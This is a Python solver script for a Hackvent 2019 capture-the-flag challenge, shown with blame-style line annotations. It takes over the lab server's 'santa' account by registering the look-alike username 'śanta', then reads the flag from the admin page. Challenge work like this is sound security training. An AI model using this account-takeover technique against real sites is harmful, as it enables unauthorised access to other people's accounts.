2019-12-29 15:24:39 +01:00
|
|
|
#!/usr/bin/python
|
|
|
|
|
|
|
|
|
|
import requests
|
|
|
|
|
import random
|
|
|
|
|
import string
|
|
|
|
|
import re
|
|
|
|
|
|
|
|
|
|
BASE_URL = "http://whale.hacking-lab.com:8881"
|
|
|
|
|
PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
|
|
|
|
|
SESSION = requests.session()
|
|
|
|
|
FLAG_PATTERN = re.compile("HV19\{[^}]*\}")
|
|
|
|
|
|
|
|
|
|
# 1. register user santa
|
|
|
|
|
res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
|
|
|
|
|
if res.status_code != 200 or "Registration successful!" not in res.text:
|
2019-12-29 18:40:38 +01:00
|
|
|
print("Server returned: %d %s" % (res.status_code, res.reason))
|
2019-12-29 15:24:39 +01:00
|
|
|
print(res.text)
|
|
|
|
|
exit(1)
|
|
|
|
|
|
|
|
|
|
# 2. login
|
|
|
|
|
res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
|
|
|
|
|
if res.status_code != 200 or "username not found or wrong password!" in res.text:
|
2019-12-29 18:40:38 +01:00
|
|
|
print("Server returned: %d %s" % (res.status_code, res.reason))
|
2019-12-29 15:24:39 +01:00
|
|
|
print(res.text)
|
|
|
|
|
exit(1)
|
|
|
|
|
|
|
|
|
|
# 3. get flag
|
|
|
|
|
res = SESSION.get(BASE_URL + "/admin.php")
|
|
|
|
|
if res.status_code != 200 or "username not found or wrong password!" in res.text:
|
2019-12-29 18:40:38 +01:00
|
|
|
print("Server returned: %d %s" % (res.status_code, res.reason))
|
2019-12-29 15:24:39 +01:00
|
|
|
exit(1)
|
|
|
|
|
|
|
|
|
|
print(FLAG_PATTERN.search(res.text))
|
